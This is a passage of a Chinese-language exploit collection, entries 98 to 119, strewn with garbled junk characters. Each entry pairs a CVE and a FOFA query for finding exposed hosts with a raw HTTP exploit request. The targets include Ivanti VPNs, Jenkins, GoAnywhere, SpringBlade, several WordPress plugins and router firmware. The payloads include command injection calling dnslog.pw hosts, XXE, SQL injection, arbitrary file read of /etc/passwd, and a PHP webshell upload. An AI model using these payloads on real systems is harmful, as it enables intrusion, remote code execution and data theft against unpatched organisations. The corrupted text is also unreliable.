+ O2 Z; i- N/ p& q# y9 k' IContent-Type: application/x-www-form-urlencoded; charset=UTF-8- W3 P9 O9 N4 U9 \* Z, n
X-Requested-With: XMLHttpRequest
' O. s3 t: t0 M/ t9 o: G8 s* Q! g, n
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
; V x' S5 h* N- m
2 i/ n# ]4 }# ]: `. x+ Y
! [) ]; Z) d3 ^! {2 A! @99. Ncast盈可视高清智能录播系统busiFacade RCE5 B1 ?$ h! q* L2 Z
CVE-2024-03050 }) D2 R* k# a, G4 Y
FOFA:app="Ncast-产品" && title=="高清智能录播系统"3 Q: N* ?8 q4 t7 u) H; y/ \: ]
POST /classes/common/busiFacade.php HTTP/1.11 B( A7 F ]9 W6 ]& k I
Host: 192.168.40.130:8080
" ?0 r+ e7 d2 R8 W, G% ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0: r3 L) Y0 G5 S N
Connection: close
. j, \- U5 R$ n+ OContent-Length: 154
5 M4 m% v& J- X5 G) w+ w9 K+ _Accept: */*5 K- }9 J9 F8 ^& [' ]
Accept-Encoding: gzip, deflate4 c! _% T8 W" ^- ], ^# _; y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 h6 x: ?* t0 c, s! }4 }
Content-Type: application/x-www-form-urlencoded; charset=UTF-8& B# I( Q0 L& d& V& w
X-Requested-With: XMLHttpRequest$ W# {+ k3 r1 _; q$ }# B
6 l& A6 ^4 ]; [+ ^
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D6 J) @) B0 c. A- d+ v6 Z; z& U
. E! `& O: n/ | O. M, R) h5 @
" n1 o2 u v+ i/ g100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传1 P5 ~; m1 g! F* U0 V1 D9 }) Y/ u! H: j
CVE-2024-0352
$ y) p; g; ?/ X( D4 i8 D xFOFA:icon_hash="874152924"- |1 W( I% X2 P3 Q9 t
POST /api/file/formimage HTTP/1.1: R( P4 Q1 @ C$ x1 D4 R
Host: 192.168.40.130
* D+ z7 e( L. X! s$ cUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
+ P2 l6 D& s, [: ]Connection: close4 `2 N4 U8 E! f: @( z, S
Content-Length: 201+ Y1 u# P+ M7 z. B0 [: D
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
8 {0 k7 _1 a- ~+ y) XAccept-Encoding: gzip& H( L9 `9 r @, @7 ]2 S2 j' D
: }- q$ s% N2 K. j: ~/ m------WebKitFormBoundarygcflwtei- Y1 b5 r4 k- _: n
Content-Disposition: form-data; name="file";filename="IE4MGP.php": [' P# U& w" ?2 p
Content-Type: application/x-php6 E- h2 f; v9 q. u
' g; {& o5 s# o$ S) c
2ayyhRXiAsKXL8olvF5s4qqyI2O5 }" D% h0 t* _ g9 a3 z+ U
------WebKitFormBoundarygcflwtei--
( e0 e. C8 S, L
$ F9 L& c* @- u! {$ e" {) r. j6 E2 C, @8 u, f/ u. D( w5 ^1 Q! Z
101. ivanti policy secure-22.6命令注入& K! o4 ? x3 P4 U0 A& i) `5 u; x, k
CVE-2024-21887
y9 k0 p; p+ e7 {$ Q8 AFOFA:body="welcome.cgi?p=logo"9 Q _( b& V y1 O
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
# E5 ^0 A! ]2 o9 [% M8 ZHost: x.x.x.xx.x.x.x$ e& a, T4 ?* I5 D! [6 r6 H# R8 N
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+ G/ U: @. O. _8 NConnection: close
3 g" k2 w% c3 r/ aAccept-Encoding: gzip: ?( i7 T, V* Q$ g- x2 d" ^
+ @! T6 e0 g& `. L7 e5 p/ n3 A
0 q s; m6 n( f5 F5 p* b! \102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
5 V6 y% y$ k7 FCVE-2024-21893& [1 b- A; I! Y, n! e
FOFA:body="welcome.cgi?p=logo"7 w" ^& G$ V7 I$ ~ ]
POST /dana-ws/saml20.ws HTTP/1.1
5 Y8 ?. a$ g2 z( }: D' [. mHost: x.x.x.x
, X' S0 ]/ r6 `' X1 `! h* HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
7 }- H( F* k4 Z5 YConnection: close s7 b" y$ a2 {$ J+ G; V
Content-Length: 792
0 w) S* N" m3 Y% S- L p0 qAccept-Encoding: gzip3 t% w" d# d& b5 J. K
9 q' y( l7 ^; b4 \9 b9 Y, ~' W
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
2 p: m x3 `9 j0 m0 B0 N* z" W! E1 r3 i+ Q# a) C; H
103. Ivanti Pulse Connect Secure VPN XXE
4 L5 Z- y# x- lCVE-2024-22024
. \2 a# L- }* {. S% aFOFA:body="welcome.cgi?p=logo"1 n, |1 P( q1 D H% o4 E
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
" m9 L) I7 G; ^/ ]9 nHost: 192.168.40.130:1117 e. n; S# d0 S; Y1 x" r
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
7 }: U) L! I' gConnection: close
7 w M8 T5 w% ?% |2 ~/ V% VContent-Length: 204( O ?1 P! ]+ B
Content-Type: application/x-www-form-urlencoded$ S5 J" S G1 w/ w' U2 v
Accept-Encoding: gzip
- b7 Z. P$ H/ I0 E6 G
% R/ E- q4 p7 v# Z8 J h+ F: Y) vSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
" E4 G1 \% \+ Y: c+ y- W% y- Q' ~2 A7 ?! V7 H% T) g
: d! ^. ?9 \1 d4 X& g其中SAMLRequest的值是xml文件内容的base64值,xml文件如下6 i) H8 G! f/ I6 \/ [# b
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>" Y' h" o' A/ ?( e6 D
* X0 M% B9 O" p! v( N7 J8 d
! o) R' G% D/ T& r% i( J& y& p: m8 o104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露5 j( P. N6 A3 @3 @
CVE-2024-0569
- Y' p W X" nFOFA:title="TOTOLINK"
- ^" x) N* h9 x$ Q/ s' LPOST /cgi-bin/cstecgi.cgi HTTP/1.1/ ~& G& D/ G6 f
Host:192.168.0.1; Y3 f; Q: @8 [9 j. C
Content-Length:41
T+ _2 J# n' E* O# AAccept:application/json,text/javascript,*/*;q=0.01# b' M4 }7 A* Y
X-Requested-with: XMLHttpRequest
4 K% s. W* }# L1 z! H; TUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.361 e- I" k8 |! l3 H( Y8 z; X* d$ y
Content-Type: application/x-www-form-urlencoded:charset=UTF-8$ H* n$ z+ r* q) `
Origin: http://192.168.0.1+ Z$ k& n& E* G9 B! Q- P
Referer: http://192.168.0.1/advance/index.html?time=1671152380564% q% f# ~- g/ s% j c# ^# W
Accept-Encoding:gzip,deflate$ w- P0 p/ `8 P6 [2 U5 ?
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7/ J- w5 M/ s2 ~0 p5 b" m
Connection:close2 d' ?& w3 u8 |& K) Z4 q6 O* G
; [) s: }. f& T3 F( d{
. w) N$ K$ J# Z4 p* {) k"topicurl":"getSysStatusCfg",
% K6 X1 K" o$ D T"token":""
2 X3 Q p8 M1 l3 }+ h}( U9 y; j Z- Q- V* @9 E
3 o& R/ `. J: W" H8 ~- y( t* {0 |
105. SpringBlade v3.2.0 export-user SQL 注入
( h3 a! {$ a8 W3 QFOFA:body="https://bladex.vip"
9 e T8 L3 P' x$ R. g) Thttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
( F+ U9 B. D2 D A. S/ {# U; h
1 b5 t4 m# k1 N) Q8 K. e106. SpringBlade dict-biz/list SQL 注入
: ]$ {3 Y5 _) x: s3 `9 i6 IFOFA:body="Saber 将不能正常工作"
# c3 H, @" M4 ]6 E$ v$ t5 z5 y x$ t& o2 VGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
, H/ \& C* J, D7 u) q( c) qHost: your-ip: Q: K/ m' _! ]2 W0 s0 F c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.365 o7 E& J6 V* l) ^- _2 l
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
- |' e$ X9 L: I- X& J7 N! }Accept-Encoding: gzip, deflate
& _4 s( A) K4 DAccept-Language: zh-CN,zh;q=0.96 {$ ^1 M4 Z2 |' v5 d; M
Connection: close; A5 i6 @! U3 c; a/ M
9 t9 z0 \+ a) @1 L8 O2 S
- F" V2 D/ a S0 e! K6 u
107. SpringBlade tenant/list SQL 注入
+ l8 a) t% G' ]( Z2 fFOFA:body="https://bladex.vip"# x% J1 W0 b1 ?1 H0 M7 H0 `+ S
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1% G5 {5 z& I" Y6 o% ~! F
Host: your-ip
) q" q5 T( G& V$ G, E. ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ s% D# i: ?! [0 e3 K, x
Blade-Auth:替换为自己的0 o, J: M- r5 V5 q/ Q' F
Connection: close
5 P! m1 ~6 W* s; t, Z6 M0 ^4 z4 J3 u
c2 d: T. X! K# [1 |
108. D-Tale 3.9.0 SSRF/ k3 a$ g- x( B. c# q0 f% E
CVE-2024-21642' x Z% C u' t, o9 d
FOFA:"dtale/static/images/favicon.png"
6 E; a& [6 N5 M: X9 a4 d, o- `8 iGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1- [+ b6 g7 H3 M p/ Q
Host: your-ip
0 R; S8 p" Q* l# ?" M0 WAccept: application/json, text/plain, */** w& Q2 q U) \2 Y8 V7 z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
3 G7 B* W0 |' c Z% fAccept-Encoding: gzip, deflate6 ^* B' s2 J" E( V6 k' Z+ J- @
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8- C5 Q1 E9 D# [6 P
Connection: close9 z: d( s/ S9 w
' B- M* n8 D( X! c' c5 K0 ]. {) f
/ _ T* u _ g' f109. Jenkins CLI 任意文件读取0 N/ {( B, X6 S( x; t8 t
CVE-2024-23897
! r2 g# w, ~$ G' z) p3 ~FOFA:header="X-Jenkins"
4 L/ @7 Z) d- u% |- V) KPOST /cli?remoting=false HTTP/1.1, @, Q0 ^, L2 p1 ^' }. h
Host:2 I; E" k, L) E4 K) y" f2 F
Content-type: application/octet-stream
+ o: o$ P4 h! Z3 Z3 w. k" x% Y& _& bSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e926 j* V, v k3 W3 Q$ b2 e
Side: upload0 F! j; ]( Y( K) Z/ s
Connection: keep-alive L5 R4 d* o. u7 t) |; i* B8 {0 _
Content-Length: 163
- B9 s; h+ o3 H& f; J! G$ n% [( W$ a- J) f1 i
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'! D1 s; J4 Q/ T" h; n
. [* s) o4 K* m* c
8 [3 Q" i/ P, c' O% kPOST /cli?remoting=false HTTP/1.1
2 d( Y! @6 M; q E+ y' UHost:
3 K* Z2 {5 C/ `5 k& k! f3 KSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
# l' v, _# j# N# @. Odownload
9 }" [ \0 R6 T+ y- z/ cContent-Type: application/x-www-form-urlencoded
( r5 F# J$ o9 D- B7 PContent-Length: 0
4 U; g* v) F$ ^; C
9 ^6 N% H4 |: J! }. u8 r) \3 k* V, c9 T3 O: U0 y) o. c E! n- f( v
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
" m( H: ?0 ]; D9 V- _1 a! pjava -jar jenkins-cli.jar help
0 ~. Z2 v% ] t! G3 z0 H[COMMAND]0 h( b1 P: [2 R0 u' J& c+ ?5 @
Lists all the available commands or a detailed description of single command.
' v1 {9 ]0 {# B COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
, k; x+ m* ~& D4 x/ L( f5 D: o
' b/ o0 @4 I9 L5 {! c- x) m1 a% C; z. r6 }% u) h
110. Goanywhere MFT 未授权创建管理员
7 _0 d% r: g/ _8 |' B r- h2 iCVE-2024-0204
/ l6 c& X" `% o0 WFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"% d( P" S: x5 H# ?( i) J6 [+ C
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.14 ? J" x6 R# p8 m; g8 g
Host: 192.168.40.130:8000
: j1 w9 w+ M) ZUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.361 @0 |, G( `+ X7 L" c1 u
Connection: close
( `8 N5 u* `! M Z( W6 } E ]Accept: */*
2 b" K+ p- P& b0 k0 jAccept-Language: en% W }4 \: c3 b3 E b% z! o1 w
Accept-Encoding: gzip
- G/ ~$ ]3 E- Y8 @! d+ V9 |7 e, D: }$ R. `! R' c3 D
# L' f$ o1 y. N111. WordPress Plugin HTML5 Video Player SQL注入9 ]3 Q1 a2 J; z' \4 ~& _! H
CVE-2024-10618 r* Z# ?# E2 j* ^3 ~; \
FOFA:"wordpress" && body="html5-video-player"/ q+ z# c2 Y' x! ^2 q
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
* [) C/ e3 I2 [1 ]" FHost: 192.168.40.130:112" S' W3 x9 C5 ?$ [7 b$ z
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" z4 V `; X* w: H! [; [! c
Connection: close
4 N1 F: J& W" C/ a7 S9 mAccept: */*' f& J8 v$ E9 y* V
Accept-Language: en
; k y! }2 Z/ W5 `" z; m3 A" O jAccept-Encoding: gzip
) d, R/ _1 W% \1 W; c* O
6 F, a) ]+ h3 S9 t6 a
, Q" H# @2 A& z% ?1 g, A& c112. WordPress Plugin NotificationX SQL 注入& g6 n/ E* D9 P
CVE-2024-16988 P$ Y# a, S. o
FOFA:body="/wp-content/plugins/notificationx"
% P# S: b: { w! \: z- s; cPOST /wp-json/notificationx/v1/analytics HTTP/1.1! x, g, O4 k1 M9 k& Z9 _0 M
Host: {{Hostname}}
7 }' O' S: J6 G- c5 ]Content-Type: application/json
2 E/ k2 _9 t1 ?/ h9 C
8 F4 d, V1 D# \8 S y( m) T{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}" K% H9 o, S9 f; R/ r0 N
8 |# B. M* A- h- f0 A$ s1 D
2 Z3 R: n" q3 Z. {- r$ Y! t/ Y
113. WordPress Automatic 插件任意文件下载和SSRF
. y6 P& \: \2 p" Y6 ~" FCVE-2024-27954
7 y3 k! |4 t5 |. Z6 tFOFA:"/wp-content/plugins/wp-automatic"+ e2 |/ Q# `$ d1 K) Q ]
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1) u" O' N7 v) ?4 s, V% z) G* g* Q
Host: x.x.x.x
' u9 E7 v* a( H; mUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
0 T! Y7 m/ R. ]+ _0 oConnection: close
) M, I; d$ }, hAccept: */*5 R3 i4 @' ?2 N5 E" r1 [3 [
Accept-Language: en. i; g, J6 u0 N% _/ P/ \
Accept-Encoding: gzip/ i, y, N _ A6 d% |
+ I& V2 u! Z4 W" ?9 Z% \. v
% L! C* w) T2 o# a \9 k) G5 K4 v6 D114. WordPress MasterStudy LMS插件 SQL注入
, B+ z( I- X* E9 b: |FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"3 L6 s8 T9 _4 y
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
# ~0 Y3 D' r1 P' x- CHost: your-ip
+ p% d$ Z1 d1 M+ o( s( W PUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
$ f) R, u [: ZAccept-Charset: utf-8
7 S, ~7 i# }) c9 a1 i1 o& y. M/ \Accept-Encoding: gzip, deflate7 o( M$ ?/ t( S( d6 H
Connection: close3 ^; v- F& U& ]( U4 M! b/ M# G
: j I2 c- A H6 R: v& H1 E( h
, @0 u! y& x; m& P9 E
115. WordPress Bricks Builder <= 1.9.6 RCE
9 w8 M4 }# m% S; k2 JCVE-2024-25600) _8 i) h$ ?: \9 U
FOFA: body="/wp-content/themes/bricks/"; C- i0 o2 t, ~3 C6 |( B/ f) J
第一步,获取网站的nonce值" Z7 d3 S, s3 L r ]$ {8 R ~
GET / HTTP/1.1
: a/ A/ H# d( ^! D) qHost: x.x.x.x0 r1 {& O4 y6 r+ E9 E( T
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36( y/ W# b% |# d- F$ Z7 f
Connection: close9 u9 R G5 T, X0 X: N
Accept-Encoding: gzip
8 B) p& l/ D$ \; T+ S% P9 x: J5 |2 a j7 v
$ M2 E; r. a; i' g7 g第二步替换nonce值,执行命令# C! ]- e% l0 ^! e
POST /wp-json/bricks/v1/render_element HTTP/1.1
& N# l7 a3 x0 @: v% C) wHost: x.x.x.x. O; Q$ O# x& ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.361 d2 I# J/ U1 \- P
Connection: close
; M- G6 N0 D _( H6 K t tContent-Length: 356& ~# D% w. o' g( K" `
Content-Type: application/json
# x M: \+ q. a2 gAccept-Encoding: gzip' J( H! ]0 y/ R5 v0 K- l9 n
u: Y( O4 v1 b& v4 ^& a{6 w C! {% o. v7 k% X
"postId": "1",4 |% o K: C% D3 h. e. P
"nonce": "第一步获得的值",5 `' b6 v3 c' J S9 n! ^
"element": {
! ?) w4 Y- j( w0 w "name": "container", f/ Z, i0 l0 ?* w
"settings": {
, c/ [9 l9 q0 \3 `( G! b! T# d "hasLoop": "true",
* E1 ] @( a/ y% ^, S$ N7 A9 h# b "query": {6 h- ^& m8 i7 ]8 Z/ b7 P
"useQueryEditor": true,2 h5 L/ E% }( U9 d; E1 ~
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
( D, U$ r: f' h1 b: m( R% Z. Q "objectType": "post"
# d; `. R/ J+ Y# L }
( g) ^) n- w+ C' m; V1 T% w: O }6 x1 c# F, h6 d6 m) C* b# j, `# e
}5 a/ ~4 U8 L }8 Y" X5 D/ A
}3 l. l1 ^; \+ T
2 W: g) q# {; ~+ }
3 o& u9 p1 p; ]& _
116. wordpress js-support-ticket文件上传
/ Q. C* {9 ^2 F- y2 ]+ ]# C! vFOFA:body="wp-content/plugins/js-support-ticket"
" |# _' ]7 X, ]1 \$ k' kPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
. @, ^+ {/ V" u- |( v6 IHost:
. |" B8 }& }+ d' ~1 ?( Q/ _# lContent-Type: multipart/form-data; boundary=--------767099171
, G/ ]/ X2 X9 r* N4 f/ dUser-Agent: Mozilla/5.0
# I3 b1 ~/ d5 ~% |4 b
9 U* o% N: M! M9 G----------767099171
; t- O/ o& N' ?3 \" dContent-Disposition: form-data; name="action"5 N" X1 |/ y" c+ \% J1 q' _) E
configuration_saveconfiguration
2 M* T! s( G+ B5 }----------767099171; l4 C( A+ a+ o& G% [, S7 i, B& B, r
Content-Disposition: form-data; name="form_request"$ r5 n V2 @ D+ M2 G( R6 W4 V
jssupportticket7 f( ` f e7 G5 X
----------767099171* u# w3 U7 U, u+ C. @2 \2 b
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
% X: K: I6 y0 z( E( GContent-Type: image/png
- M6 P2 q) V# @4 B----------767099171--6 Y, L5 Z: m0 y+ s! g& x
5 A0 w3 g" q# h, S# O# V: R. M# q/ T1 c, ~
117. WordPress LayerSlider插件SQL注入
4 U+ t8 x9 [1 ?; _; P7 Wversion:7.9.11 – 7.10.0
' s6 V# [. w) y, I. B6 S3 rFOFA:body="/wp-content/plugins/LayerSlider/"- C$ R; }6 N, w4 }# r6 Z3 Y
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1& V- N# M( b7 B- d5 D
Host: your-ip. K. x6 B8 e. @) V c7 D- x& j1 e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0; D2 f% e H2 l E( q' D0 M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 u: Z- g+ {5 D! m. _) vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 B# ~) w6 I0 z9 q0 ]Accept-Encoding: gzip, deflate, br
8 A4 ~6 m! S J0 m4 sConnection: close% F" I/ G) O1 q
Upgrade-Insecure-Requests: 1
+ q T! ?: V- i3 w$ R) j, g
4 X) `& j' d- K1 ]3 m& o' W
6 S7 ?* L! _ K% e: I' J118. 北京百绰智能S210管理平台uploadfile.php任意文件上传6 t" i' ]- U7 u
CVE-2024-0939
+ {8 I" r* `4 T7 E* v8 y) HFOFA:title="Smart管理平台"
+ g2 P% }* G {. S! mPOST /Tool/uploadfile.php? HTTP/1.1' L" Y' g r: \3 [6 r7 v" }
Host: 192.168.40.130:8443 c) I, i) `: m: v1 K+ m
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8# w" Z* g5 H, h% j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0" k2 ]8 f$ h6 K2 y0 l7 Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
' }* y: m3 v2 yAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 V2 L- L) K' N8 z% j# ^) W& c
Accept-Encoding: gzip, deflate
. @) E* e0 s& x; \Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887; t0 e) u# G1 _ ~' h9 A
Content-Length: 405
2 l1 `' M5 f8 _% n4 M6 kOrigin: https://192.168.40.130:8443
" m2 y8 U7 P9 L q5 z& |Referer: https://192.168.40.130:8443/Tool/uploadfile.php
! ?# F& S1 S/ E7 w* UUpgrade-Insecure-Requests: 1: m2 @& l$ V! G# O" f
Sec-Fetch-Dest: document
% u/ c6 N- B1 m. i: W MSec-Fetch-Mode: navigate4 P" c! Z( \/ w9 ~7 M0 z* X6 q
Sec-Fetch-Site: same-origin7 y3 g# t( b: d! c. \" O# ~
Sec-Fetch-User: ?10 I6 J2 n) D& @' [' L+ K* d9 H5 p
Te: trailers1 U, `6 ?9 y* x4 ?9 {
Connection: close$ ?( |" M7 d5 l7 G* d
% e" n6 J( Y; D$ \7 J-----------------------------139797012227476466340371828876 Z2 \/ N' L3 z$ g) _! X a
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
% O2 Y6 d2 Y$ m+ gContent-Type: application/octet-stream
8 L& ]+ ?2 u2 A% l! i2 `3 d7 n
6 i! ~# B' M4 Z<?php
# Q1 A1 X1 r# }* zsystem($_POST["passwd"]);4 q6 Z, d" v ~& S2 |
?>
. G$ C* Z: V+ N3 u* |1 a4 |& b-----------------------------13979701222747646634037182887
' S9 d+ V* n4 L6 y2 b% i9 S0 \* sContent-Disposition: form-data; name="txt_path" m( W. T# q, \' b
- h% x) L7 Q5 _- O
/home/src.php
- E7 k% _/ f& {8 y$ u2 \-----------------------------13979701222747646634037182887--
: V7 f) L; Q% I# U: _3 v- V( V1 r& A8 H3 j+ F
; ^/ D' C8 C3 a+ B0 z
访问/home/src.php
# P4 s! v* d l% f3 f1 G6 S3 Z9 _0 M# h& ]1 [# B& j+ d1 c2 I
119. 北京百绰智能S20后台sysmanageajax.php sql注入) p2 i, g/ Y. F2 G0 l/ N8 F6 P
CVE-2024-1254
+ M) H+ t; n- U; `0 s! H- ^4 c/ yFOFA:title="Smart管理平台"
( N/ M$ X1 C# f3 F5 H8 @" g9 C先登录进入系统,默认账号密码为admin/admin
- s9 G) B1 v8 ^1 M0 C' _+ m" ZPOST /sysmanage/sysmanageajax.php HTTP/1.11- Q, }6 Z3 ^ A" J
Host: x.x.x.x
4 }0 {; y: [) P/ N9 t. JCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
- D0 a- [! G/ |8 \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.02 M7 j+ e/ O! \5 c
Accept: */** ]( {* ~! ?5 M! x# r
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; }4 Q+ p4 t( \; t; p: gAccept-Encoding: gzip, deflate
1 _2 p: |7 S. SContent-Type: application/x-www-form-urlencoded;
+ ^/ ?- E |& ~' T: @Content-Length: 109
+ |5 _% X- f2 `- B# J, QOrigin: https://58.18.133.60:8443# L% g% D9 v* _7 T
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php( M2 W7 a. n1 u( c/ u. @
Sec-Fetch-Dest: empty
/ }- M `8 m+ Z. ]0 {Sec-Fetch-Mode: cors
7 g9 w+ x2 }( o$ R" Y$ NSec-Fetch-Site: same-origin$ _" V) D5 [% n
X-Forwarded-For: 1.1.1.1
) o6 y+ N) [1 k% ?1 D; {' t7 \: BX-Originating-Ip: 1.1.1.1' j9 h& e! ]3 x( j3 x6 t0 b
X-Remote-Ip: 1.1.1.11 f Q# w+ T/ }" `9 } [: `
